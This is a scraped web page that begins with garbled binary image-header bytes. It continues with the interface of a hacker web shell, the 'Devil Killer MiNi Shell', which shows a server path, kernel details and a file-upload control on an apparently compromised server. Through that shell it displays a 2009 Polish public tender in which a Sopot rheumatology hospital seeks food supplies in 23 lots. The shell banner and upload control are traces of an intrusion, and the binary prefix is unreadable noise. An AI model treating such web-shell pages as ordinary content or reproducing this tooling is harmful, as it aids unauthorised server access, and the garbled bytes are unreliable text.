JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20091007/349894-N-2009.html

<p class="kh_header"><b>Sopot: Sukcesywne dostawy artykułów spożywczych do Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz-Kosko w Sopocie</b><br>
<b>Numer ogłoszenia: 349894 - 2009; data zamieszczenia: 07.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zespół Reumatologiczny im. dr Jadwigi Titz-Kosko , ul. Grunwaldzka 1-3, 81-759 Sopot, woj. pomorskie, tel. 058 5557528.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzr.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych do Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz-Kosko w Sopocie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1 - ziemniaki, warzywa i warzywa suszone CPV: 03212000-0 (ziemniaki i warzywa suszone), CPV: 03221000-6 (warzywa)
48 pozycji: łącznie 30 785 kg, 7 330 szt.
PAKIET 2 - owoce CPV: 03222000-3 (owoce i orzechy) 
10 pozycji: łącznie 2 873 kg
PAKIET 3 - jaja CPV: 03142500-3 (jaja)
1 pozycja: łącznie: 25 000 szt.
PAKIET  4 - miód naturalny CPV: 03142100-9 (miód naturalny) 
1 pozycja: łącznie 400 szt.
PAKIET 5 - świeży drób CPV: 15112100-7 (świeży drób)
5 pozycji: łącznie 2 930 kg
PAKIET 6 - mięso wołowe i mięso wieprzowe CPV: 15111000-9 (mięso wołowe), CPV: 15113000-3 (wieprzowina)
7 pozycji: łącznie 3 590 kg
PAKIET 7 - produkty mięsne CPV: 15130000-8 (produkty mięsne)
15 pozycji: łącznie 2 780 kg
PAKIET 8 - produkty drobiowe CPV: 15131500-0 (produkty drobiowe)
2 pozycje: łącznie 400 kg
PAKIET 9 -mrożone produkty rybne CPV: 15229000-9 (mrożone produkty rybne)
4 pozycje: łącznie 785 kg
PAKIET 10 ryby puszkowane i pozostałe ryby konserwowane lub przetworzone CPV: 15240000-2 (ryby puszkowane i pozostałe ryby konserwowane lub przetworzone), CPV: 15234000-7 (ryby wędzone), CPV: 15241500-4 (makrela), CPV: 15241200-1 ( śledź przetworzony lub konserwowany), CPV: 15241400-3 (tuńczyk puszkowany)
5 pozycji: łącznie 190 kg, 900 szt.
PAKIET 11 - warzywa mrożone CPV: 15331170-9 (warzywa mrożone)
3 pozycje: łącznie 680 kg
PAKIET 12 - warzywa konserwowane lub puszkowane CPV: 15331400-1 (warzywa konserwowane i/lub puszkowane)
11 pozycji: łącznie 130 kg, 2 850 szt.
PAKIET 13 - przetwory owocowe i warzywne CPV: 15330000-0 (przetworzone owoce i warzywa)
12 pozycji: łącznie 680 kg, 1 500 szt.
PAKIET 14 - oleje i tłuszcze zwierzęce lub roślinne CPV: 15400000-2 (oleje, tłuszcze zwierzęce lub roślinne)
2 pozycje: łącznie, 400 kg, 380 l
PAKIET 15 - produkty mleczarskie CPV: 15500000-3 (produkty mleczarskie)
10 pozycji: łącznie 1 520 kg, 3 200 szt., 9 645 l
PAKIET 16 - różne produkty spożywcze CPV: 15800000-6 (różne produkty spożywcze)
11 pozycji: łącznie 1 974 kg, 3 080 szt.
PAKIET 17 - produkty przemiału ziarna CPV: 15610000-7 (produkty przemiału ziarna)
13 pozycji: łącznie 3 020 kg
PAKIET 18 - pieczywo, wyroby piekarskie i ciastkarskie CPV: 15810000-9 (pieczywo, wyroby piekarskie i ciastkarskie)
6 pozycji: łącznie 20 345 szt.
PAKIET 19 -  kakao, czekolada i wyroby cukiernicze CPV: 15840000-8 (kakao; czekolada i wyroby cukiernicze)
6 pozycji: łącznie 340  kg, 2 100 szt. 
PAKIET 20 - kawa, herbata i podobne produktu CPV: 15860000-4 (kawa, herbata i podobne produkty)
8 pozycji: łącznie 351,5 kg, 820 szt.
PAKIET 21 -  masło CPV: 15530000-2 (masło)
1 pozycja: łącznie 1 100 kg
PAKIET 22 -  przyprawy i przyprawy korzenne CPV: 15870000-7 (przyprawy i przyprawy korzenne)
17 pozycji: łącznie 929 kg, 1 344 szt., 270 l
PAKIET 23 - specjalne produkty odżywcze CPV: 15880000-0 (specjalne produkty odżywcze)
1 pozycja: łącznie 3 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.21.20.00-0, 03.22.10.00-6, 03.22.20.00-3, 03.14.25.00-3, 03.14.21.00-9, 15.11.21.00-7, 15.11.10.00-9, 15.11.30.00-3, 15.13.00.00-8, 15.13.15.00-0, 15.22.90.00-9, 15.24.00.00-2, 15.23.40.00-7, 15.24.15.00-4, 15.24.12.00-1, 15.24.14.00-3, 15.33.11.70-9, 15.33.14.00-1, 15.33.00.00-0, 15.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki wynikające ze Specyfikacji Istotnych Warunków Zamówienia oraz warunki wynikające z art. 22 ustawy z 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) tj. Wykonawcy, którzy: 
a/ posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
b/ posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia,
c/ znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonania zamówienia;
d/ nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych.
Zamawiający ustala następujący sposób oceny  warunków udziału w postępowaniu: 
a/ w zakresie warunku wskazanego w pkt.I lit.a i d - ocena spełniania warunków nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w pkt.1 i 2; 
b/ w zakresie warunku wskazanego w pkt.I lit.b - ocena spełniania warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w pkt.3, 
c/ w zakresie warunku wskazanego w pkt.I lit.c - ocena spełniania warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w pkt. 4;.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert.

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument.
2. wypełnione Oświadczenie - stanowiące Załącznik nr 2 do SIWZ

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument.
3. wypełnione Oświadczenie - stanowiące Załącznik nr 2 do SIWZ

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument.
4. wypełnione Oświadczenie - stanowiące załącznik nr 2 do SIWZ

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument.
5. wypełnionego FORMULARZA OFERTY - stanowiącego załącznik nr 1 do SIWZ. 
6. wypełnionego FORMULARZA CENOWEGO - stanowiącego załącznik nr 3 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wzr.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zespół Reumatologiczny im. Jadwigi Titz - Kosko, ul. Grunwaldzka 1-3, 81-759 Sopot, Sekretariat, II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 10:00, miejsce: Wojewódzki Zespół Reumatologiczny im. Jadwigi Titz - Kosko, ul. Grunwaldzka 1-3, 81-759 Sopot, Sekretariat, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby do kontaktów: 
Katarzyna Gronek: tel. 058 555-75-28, Anna Cieplińska, Kierownik Działu Żywienia: tel. 058 555-75-69
Główne warunki finansowania i płatności : 
Płatności z tytułu dostaw przedmiotu zamówienia zostanie dokonana w terminie do 30 dni od daty dostawy i otrzymania faktury.

Forma prawna , jaką musi przyjąć grupa wykonawców, której zostanie udzielone zamówienie : 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo: 
- listę Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oraz 
- dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia .    
Pełnomocnictwo musi być złożone w formie oryginału, poświadczonej notarialnie lub przez mocodawcę kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu. Treść pełnomocnictwa musi jednoznacznie określać czynności, do wykonywania których pełnomocnik jest upoważniony. 
Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda - przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność  za niewykonanie lub nienależyte wykonanie zobowiązania.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - każdy z Wykonawców poświadcza także własne dokumenty.
Zamawiający oceni spełnienie warunków wymaganych od Wykonawców według następujących zasad:
1.1 Jeżeli Wykonawca nie wykaże się spełnieniem warunków określonych w Rozdz. IV. SIWZ, zostanie wykluczony z postępowania.
1.2 Zamawiający dokona oceny spełniania warunków w oparciu o złożone dokumenty na zasadzie  spełnia / nie spełnia.

DODATKOWA INFORMACJA DLA WYKONAWCÓW :
-	MAJĄCYCH  SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA ZA GRANICĄ: 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:  - zamiast dokumentów wskazanych w pkt. II ppkt.1 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert); 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów wskazanych w pkt. II ppkt.1 SIWZ - Wykonawca winien je zastąpić dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym  albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

- WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA : 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia.
    
Pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie lub przez Wykonawcę kopii, albo sporządzonego przez notariusza odpisu lub wyciągu z dokumentu. Treść pełnomocnictwa musi jednoznacznie określać czynności, do wykonywania których pełnomocnik jest upoważniony. 

Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania wynikającego ze złożonej oferty.

UWAGA: jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda - przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów. 
Każdy z Wykonawców jest zobowiązany złożyć dokumenty wymagane przez Zamawiającego
w jednej z następujących form:
- oryginały,
-kserokopie poświadczone za zgodność z oryginałem przez Wykonawcę, za wyjątkiem pełnomocnictw.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - każdy z Wykonawców poświadcza także własne dokumenty .
6.	Informacje administracyjne : 
a) numer referencyjny nadany sprawie przez instytucję zamawiającą : N/10/09
b) termin składania wniosków dotyczących uzyskania dokumentów lub dostępu do dokumentów:
20 października 2009 roku do godziny 14.00, Formularz Specyfikacji  Istotnych Warunków Zamówienia  dotyczącej niniejszego postępowania można odebrać osobiście, na stronie internetowej www.wzr.com.pl lub za zaliczeniem pocztowym w:
Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1-3
81-759 Sopot
Sekretariat, I piętro 
cena Formularza Specyfikacji Istotnych Warunków Zamówienia - 10 zł (+ VAT) 
c) MIEJSCE I TERMIN SKŁADANIA OFERT.
Ofertę należy doręczyć do dnia : 21 października 2009 roku o godz. 10.00 do: 
Wojewódzki Zespół Reumatologiczny im. Jadwigi Titz - Kosko                                  
ul. Grunwaldzka 1-3, 81-759 Sopot                                                                  
Sekretariat, II piętro
d) MIEJSCE I TERMIN OTWARCIA OFERT.
Komisyjne otwarcie ofert nastąpi w trakcie posiedzenia Komisji Przetargowej, które odbędzie się w  dniu: 
21 października 2009 roku o godz. 11.00 w:      
Wojewódzki Zespół Reumatologiczny im. Jadwigi Titz - Kosko                                 
 ul. Grunwaldzka 1-3, 81-759 Sopot                                                                     
Dział Zamówień Publicznych, I piętro, pok. nr 7B
e) język , w którym można sporządzać oferty : PL
f) minimalny okres związania ofertą : 30 dni od dnia składania ofert

INFORMACJE UZUPEŁNIAJĄCE . 
1. Jest to zamówienie o charakterze powtarzającym się. Przewidywany czas publikacji następnego ogłoszenia - wrzesień 2010 roku.
2. Zamówienie nie dotyczy projektu/programu finansowanego ze środków wspólnotowych.
Procedury odwoławcze : 
- organ odpowiedzialny za procedury odwoławcze : 
Urząd Zamówień Publicznych, ul. Postępu 17a, PL-02-676 Warszawa, Polska , e-mail: uzp@uzp.gov.pl, tel.+48 22 458 77 22, faks : +48 22 458 77 00, adres internetowy: www.uzp.gov.pl
- źródło, gdzie można uzyskać informacje na temat składania odwołań : 
Urząd Zamówień Publicznych, ul. Postępu 17a, PL-02-676 Warszawa, Polska , e-mail: uzp@uzp.gov.pl, tel.+48 22 458 78 01, faks : +48 22 458 77 00, adres internetowy: www.uzp.gov.pl
Odwołanie wnosi się w terminie 5 dni od dnia doręczenia rozstrzygnięcia protestu lub upływu terminu jego rozstrzygnięcia, jednocześnie przekazując kopię odwołania - Zamawiającemu..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniaki, warzywa i warzywa suszone - 48 pozycji: łącznie 30 785 kg, 7 330 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.20.00-0, 03.22.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> owoce - 10 pozycji: łącznie 2 873 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja - 1 pozycja: łącznie: 25 000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> miód naturalny - 1 pozycja: łącznie 400 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.21.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> świeży drób - 5 pozycji: łącznie 2 930 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso wołowe i mięso wieprzowe - 7 pozycji: łącznie 3 590 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.10.00-9, 15.11.30.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> produkty mięsne - 15 pozycji: łącznie 2 780 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Produkty drobiowe - 2 pozycje: łącznie 400 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.15.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mrożone produkty rybne - 4 pozycje: łącznie 785 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.90.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone - 5 pozycji: łącznie 190 kg, 900 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2, 15.23.40.00-7, 15.24.15.00-4, 15.24.12.00-1, 15.24.14.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warzywa mrożone - 3 pozycje: łącznie 680 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warzywa konserwowane lub puszkowane - 11 pozycji: łącznie 130 kg, 2 850 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przetwory owocowe i warzywne - 12 pozycji: łącznie 680 kg, 1 500 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</li>
